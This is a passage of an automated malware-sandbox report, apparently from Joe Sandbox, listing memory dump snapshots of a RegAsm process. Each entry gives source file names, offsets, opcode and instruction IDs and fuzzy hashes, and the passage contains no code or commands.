                                    • Instruction ID: 7d4cbad63b78fdffa5f6e1e811e4d1b86cef5237f4925329a9399e053c7c61dc
                                    • Opcode Fuzzy Hash: 83ebdfeed0898e468cf15762842cfb1cf7dbbe5e5b8513d14c7b4da6ee454615
                                    • Instruction Fuzzy Hash: B1210078D002099FCB04EFA4D988BEEBBB1FB88304F108969D814B3394DB785A54CF90
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220610378.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f0d000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 07d586b370810bf15e8d939e07fb0dccd80900219e7a08ccebccaf9c83e80135
                                    • Instruction ID: e5ac636c014eab113a4b8dd9196a807aec748938e8b13a606500763f605691b5
                                    • Opcode Fuzzy Hash: 07d586b370810bf15e8d939e07fb0dccd80900219e7a08ccebccaf9c83e80135
                                    • Instruction Fuzzy Hash: 0E112676804280CFCB16CF40D9C4B16BF71FB94324F24C5A9DD090B656C33AE85AEBA2
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f6cb9b4499e72c8263ea29513b9e838c7d69b04944f5d1d644bec6a9480fcb1f
                                    • Instruction ID: 92ce8da4a80789ac4cfbcb7659051fb5711d804b319f999847a7e8396d3619bc
                                    • Opcode Fuzzy Hash: f6cb9b4499e72c8263ea29513b9e838c7d69b04944f5d1d644bec6a9480fcb1f
                                    • Instruction Fuzzy Hash: 33117C38A05210CFC764AF78E518A9A7BF8AF8925070545A9E869DB321DB31DC02CFA1
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 717b4118f3baf399f35545b83e9efc0a9e48d60637e19984756dee6f220a58e7
                                    • Instruction ID: 5c66e72bce46f889968907bb20ce3d1d0231d2723416f73a95d85ebb6982ffcd
                                    • Opcode Fuzzy Hash: 717b4118f3baf399f35545b83e9efc0a9e48d60637e19984756dee6f220a58e7
                                    • Instruction Fuzzy Hash: F6017875C042189FDB04EFB1D9593EEBFB0FB89301F1088A6D514A72E0DB781698CB80
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b91312f01eb710ad5881ce095bf47cfff9a939490f5589d07f49e2c1c7f1619a
                                    • Instruction ID: 211ef97c0af72131b4eaa652612629ad2a5d6e27a67fd97389cac0e43b30ef45
                                    • Opcode Fuzzy Hash: b91312f01eb710ad5881ce095bf47cfff9a939490f5589d07f49e2c1c7f1619a
                                    • Instruction Fuzzy Hash: 2B01D632B001286FDB45AE69AC00BAF3BEBEBC8750B148029F915DB280CF71DD1197E0
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a81f72494d36ae93d77d1a8b4a15c1133b100f67c80dfa04b0c1713cfff30cff
                                    • Instruction ID: 23b795cd7ab68792ef597108f4257506f2aaee17d7e34298ce4009afba131615
                                    • Opcode Fuzzy Hash: a81f72494d36ae93d77d1a8b4a15c1133b100f67c80dfa04b0c1713cfff30cff
                                    • Instruction Fuzzy Hash: BA018132E41115AFDF459FA4AC00B9B3BB6EB88790F158026F904D7140CB31D9129B90
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 27746ec2e672c15083f027b642284050dbbc5380f46d5ed4224fdbcd0cce9ece
                                    • Instruction ID: 96b9f93bf3f50c695ca5ec3fe44afb9adf173ef9539efdb84fefc4ec5765b63b
                                    • Opcode Fuzzy Hash: 27746ec2e672c15083f027b642284050dbbc5380f46d5ed4224fdbcd0cce9ece
                                    • Instruction Fuzzy Hash: 2401A474E052199FCF44EFB989006AEBBB5AF48200F50856AD519E7250E73899118FA0
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 271356e0e7415298052b4d087ed4f7e6d28006722af691a7347c3060d6946832
                                    • Instruction ID: fec6de155cbe8131fe5a57e3fbb3973c303258ae23ff698d0927408a90b34b90
                                    • Opcode Fuzzy Hash: 271356e0e7415298052b4d087ed4f7e6d28006722af691a7347c3060d6946832
                                    • Instruction Fuzzy Hash: 11D02E3080430A8BC388BB62FA87BA2330DEBC4300F408120F2054B128EB78EE06D290
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: .5uq
                                    • API String ID: 0-910421107
                                    • Opcode ID: cf036c841538c498f6b656a20f8dbc81ab92625dd1a547e2b5a19d753151378c
                                    • Instruction ID: 3ef4ebbfb9d07d09e8d2f6dccb519f703a44295c1ca63a503a265140d2f5e3bb
                                    • Opcode Fuzzy Hash: cf036c841538c498f6b656a20f8dbc81ab92625dd1a547e2b5a19d753151378c
                                    • Instruction Fuzzy Hash: 79529B74E01228CFDB64DF69C984B9DBBB2BF89300F1085E9D809AB255DB359E81DF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 280698f2d95f030d8051b63a8de4bdffb0f32c1574343694f368c2e68b92f390
                                    • Instruction ID: 732ccd02572d689bb4745d645ca436f27b90edde0484a336816e59acd0aaffed
                                    • Opcode Fuzzy Hash: 280698f2d95f030d8051b63a8de4bdffb0f32c1574343694f368c2e68b92f390
                                    • Instruction Fuzzy Hash: 95B1A674E01218CFDB54DFA9D984A9DBBB2FF89310F1081A9E819AB365DB30AD41CF40
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f04ba512a3ec7e8fcddf76a1934e322af6bb33bb4ef61536e2530fe68acb99e5
                                    • Instruction ID: 76f3f3e0470a97c76f456b82646a2b79e2910167d5ec93a0f27f195ea4031d36
                                    • Opcode Fuzzy Hash: f04ba512a3ec7e8fcddf76a1934e322af6bb33bb4ef61536e2530fe68acb99e5
                                    • Instruction Fuzzy Hash: FDA1AD74A01228CFDB64DF64C994B9ABBB2BF4A300F1089E9D40DAB354DB359E81DF51
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a2cfd88448ff31f8c76b9c6e760b0e2ca49e98bed5ddb1e70b738bc1aa993bde
                                    • Instruction ID: 04b64e9c955be0365ade05d5dbc87e9d33207cf12f6ba35c59c091a44f2977cc
                                    • Opcode Fuzzy Hash: a2cfd88448ff31f8c76b9c6e760b0e2ca49e98bed5ddb1e70b738bc1aa993bde
                                    • Instruction Fuzzy Hash: B2519674E016088FDB48DFAAD484A9DBBF2BF89300F14C169E419EB365EB309942CF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a286f286ce7c3f8b48a02af2b5c281e3729d37f686c4913841a06fb93368e3db
                                    • Instruction ID: 530ee8a97129c823238cfb411a8fe589b0a961a5c08073f530eaf5e1c5d99862
                                    • Opcode Fuzzy Hash: a286f286ce7c3f8b48a02af2b5c281e3729d37f686c4913841a06fb93368e3db
                                    • Instruction Fuzzy Hash: D3519F74A01228CFCB64DF24C954BAAB7B2BF4A305F5089E9D40AAB354CB319E81DF50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c031b557e691738393e00b4d962345d3aeb1de75897d9f4ea912a580a5390bab
                                    • Instruction ID: 15c2f219e3dc99c7166905c036dacbd59243b72e6515e975e88e10e448158344
                                    • Opcode Fuzzy Hash: c031b557e691738393e00b4d962345d3aeb1de75897d9f4ea912a580a5390bab
                                    • Instruction Fuzzy Hash: 05D09E74D5421CCBDB20EFA5D851ABCF771EF85300F0168EAA409B3111D7785A519F66
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a2cf1e520f030d1742f270b92ddb9cd2085429c7cc3a6b22f78e44b81ee69cf0
                                    • Instruction ID: ce164b0ba4aa9e4afd2e0c59b24c66d536c502bc5140b5cc330c847a56a08325
                                    • Opcode Fuzzy Hash: a2cf1e520f030d1742f270b92ddb9cd2085429c7cc3a6b22f78e44b81ee69cf0
                                    • Instruction Fuzzy Hash: 91D09E34D5425C8BCB60EFA8DC517ADB771FF85300F0025A5D409B7111D7745E509E96